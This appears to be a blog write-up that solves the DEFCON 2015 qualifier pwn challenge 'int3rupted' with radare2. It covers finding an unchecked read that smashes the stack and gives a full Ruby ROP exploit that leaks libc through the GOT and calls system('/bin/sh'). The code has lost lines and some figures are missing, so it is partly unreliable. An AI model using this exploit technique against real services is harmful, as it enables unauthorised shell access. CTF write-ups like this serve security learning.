Solving 'int3rupted' from defcon 2015 qualifier with r2

June 4, 2015

In previous blog posts we’ve shown how radare2 can be useful for exploiting “baby” level challenges. Let’s show how we can use it to find the bug and ultimately exploit a 5 point pwning challenge from the DEFCON 2015 qualifiers!

You can find the binary here if you want to play along at home.

To start with, in the challenge, we were just given a hostname and ip address, no binary was given! To simulate this, we can use rarun2 to host the binary locally. The following line will run the binary on port 8888 on connections:

rarun2 program=./int3rupted_3bb8f10793b82841c44a366eb9f27223 listen=8888

So, let’s try connection with nc to try to interact. After some spamming every character, we discover that if you type in ? a help message is displayed.

impactsite ~/int3 » nc localhost 8888
> ?
Help menu:
        g - Begin execution
        db <addr> - Dump bytes at addr
        bp addr - Set breakpoint at addr
        c - Continue from breakpoint.
        ? - This text

So, now the name int3rupted makes sense! The int3 instruction is defined for use by debuggers to temporarily replace an instruction in a running program in order to set a breakpoint.

Because this is the binary is not provided, it’s going to take some work to find the bug! As we have arbitrary read with db <addr> it will just take a bit of work to find the bug.

Checking through the loader script on Linux, amd64, we can see that the elf gets loaded at address 0x400000, so you can start dumping from there.

impactsite ~ » cat /usr/lib/ldscripts/elf_x86_64.x | grep SEGMENT_START
  PROVIDE (__executable_start = SEGMENT_START("text-segment", 0x400000)); . = SEGMENT_START("text-segment", 0x400000) + SIZEOF_HEADERS;
  . = SEGMENT_START("ldata-segment", .);


Although it is a tedious process, you can dump the enough of the binary to load it up in your favorite disassembler.

So, quickly after reversing (which I will leave as an exercise to the reader), a high level overview of the binary is as follows.

  • g goes to chance game
  • high score lets you write your name into .bss area
  • db dump bytes - we used to dump bin
  • bp sets breakpoint, write 0xCC mark page as R-X (not W!) can’t do this to stack, b/c becomes unwritable :(
  • c restore from breakpoint
  • ? print help text

Let’s look at how int3rupted reads in the user’s input. The function takes in a length, a fd to read from, a buffer to write to, and a “stop” character (newline).


Oh, what’s this?!? The “length” var is increased, but it’s termination value is at length == 0. This means we have an unchecked read.

Let’s have a look at who else calls the read_user_input function.


Can it really be so simple, just a basic stack smash from main_menu? There is no system called in the binary, and there is ASLR activated, but if you recall, we have an arbitrary read, so we can just leak the addresses of libc functions, simple! There isn’t even a stack canary to worry about.

Let’s use rabin2 to find the address to read in order to leak the libc function puts.


Let’s just assume that it’s on Ubuntu trusty, because all of the other challenges were. Otherwise there are some nice database tools to use.

So, from here, there is not much left to do. Just construct an exploit that does the following:

  • leak libc address of puts
  • compute offset of /bin/sh\x00 and system
  • pop /bin/sh\x00 into rdi
  • call system

Simple, right?

And like magic, we can get a shell! 5 easy points. The final exploit below has comments for the r2 commands to get the needed values (like rop gadgets and offsets). shell

#!/usr/bin/env ruby
require_relative 'shoe'

# host = ""
# port = 52428

# rarun2 program=./int3rupted_3bb8f10793b82841c44a366eb9f27223 listen=8888
host = "localhost"
port = 8888

# ubuntu trusty libc
system_offset = 0x00046640 # is~name=system - from libc
binsh_offset = 0x0017ccdb # / /bin/sh\x00 - from libc
puts_offset = 0x0006fe30 # is~name=puts - from libc
exit_offset = 0x0003c290 # is~name=exit - from libc
# from int3rupted binary
poprdirbpret = 0x00401648 # "/R/ pop rdi;ret"
puts_got = 0x00603028 # iR~puts

@s = host, port

def read_menu
  @s.read_til_end 0.1

@s.say "?\n"
puts "[!] dumping GOT address of puts"
@s.say "db 0x#{puts_got.to_s 16}\n"
str = read_menu
puts str.split(">")[0]
libc_base_addr = (str.split("-")[0].split(":")[1].reverse.split(" ").map{|i| i.reverse}.join("").to_i 16) - puts_offset
puts "[+] libc base is at 0x#{libc_base_addr.to_s 16}"
puts "[+] system is at 0x#{(libc_base_addr + system_offset).to_s 16}"
puts "[+] /bin/sh\\x00 is at 0x#{(libc_base_addr + binsh_offset).to_s 16}"
@s.say ("g\n")
rop = "A" * 56
rop << [poprdirbpret].pack("Q") # get /bin/sh into rdi
rop << [libc_base_addr + binsh_offset].pack("Q") # /bin/sh into rdi
rop << "JUNKJUNK" # garbage popped into rbp
rop << [libc_base_addr + system_offset].pack("Q") # system("/bin/sh")
rop << [libc_base_addr + exit_offset].pack("Q") # exit cleanly :)
puts "[!] sending rop chain!"
@s.say "#{rop}\n"
str = read_menu
puts "[*] enjoy your shell"
require 'socket'
require 'timeout'
require 'rolling_timeout'

class Shoe < TCPSocket
  def recv_until str
    buf = ""
    until buf.end_with? str do
      buf << self.recv(1)

  def recv_until_re regex
    buf = ""
    while not regex.match buf
      buf << self.recv(1)

  def say str
    self.send str, 0

  def read_n_seconds secs
    # requires native threads.
    # doesn't work with ruby 1.8.x or lower
    buf = ""
      timeout(secs) do
        loop {
          buf << self.recv(1)
    rescue Timeout::Error

  def read_til_end timeout
    # timeout is time between chars
    buf = ""
    begin { |timer|
        loop {
          buf << self.recv(1)
    rescue Timeout::Error

  def tie!
    # kick off a thread just reading forever { loop { $stdout.write(self.recv(4096)) } }
    str = ""
    loop {
      ch = $stdin.read_nonblock(1) rescue nil
      if ch == nil
      self.send ch, 0